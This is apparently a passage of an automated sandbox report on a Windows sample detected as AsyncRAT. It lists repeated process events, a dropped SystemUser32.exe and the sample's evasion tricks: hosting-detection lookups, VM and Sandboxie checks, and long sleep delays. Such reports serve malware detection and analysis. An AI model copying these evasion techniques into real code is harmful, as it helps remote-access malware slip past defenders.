                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeProcess information set: NOOPENFILEERRORBOX

                            Malware Analysis System Evasion

                            barindex
                            Yara detected AsyncRAT
                            Source: Yara matchFile source: 5q4X9fRo4b.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.5q4X9fRo4b.exe.d30000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000000.1242257405.0000000000D32000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\SystemUser32.exe, type: DROPPED
                            Check if machine is in data center or colocation facility
                            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                            Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                            Source: 5q4X9fRo4b.exe, 00000000.00000002.2502473225.0000000002F41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                            Source: 5q4X9fRo4b.exe, SystemUser32.exe.0.drBinary or memory string: SBIEDLL.DLLINFO
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeMemory allocated: 1270000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeMemory allocated: 1AF40000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeMemory allocated: 1220000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeMemory allocated: 1AF40000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeMemory allocated: 12A0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeMemory allocated: 1ADF0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeMemory allocated: B40000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeMemory allocated: 1A930000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeMemory allocated: F50000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeMemory allocated: 1AF30000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeWindow / User API: threadDelayed 2906Jump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeWindow / User API: threadDelayed 6911Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5981Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3868Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7316Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2382Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7967Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1629Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7906
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1762
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exe TID: 820Thread sleep time: -37815825351104557s >= -30000sJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7208Thread sleep time: -8301034833169293s >= -30000sJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7444Thread sleep count: 7316 > 30Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7444Thread sleep count: 2382 > 30Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7500Thread sleep time: -8301034833169293s >= -30000sJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7736Thread sleep count: 7967 > 30Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7736Thread sleep count: 1629 > 30Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7776Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7964Thread sleep count: 7906 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7968Thread sleep count: 1762 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7996Thread sleep time: -3689348814741908s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exe TID: 2848Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exe TID: 1056Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exe TID: 1504Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exe TID: 3268Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
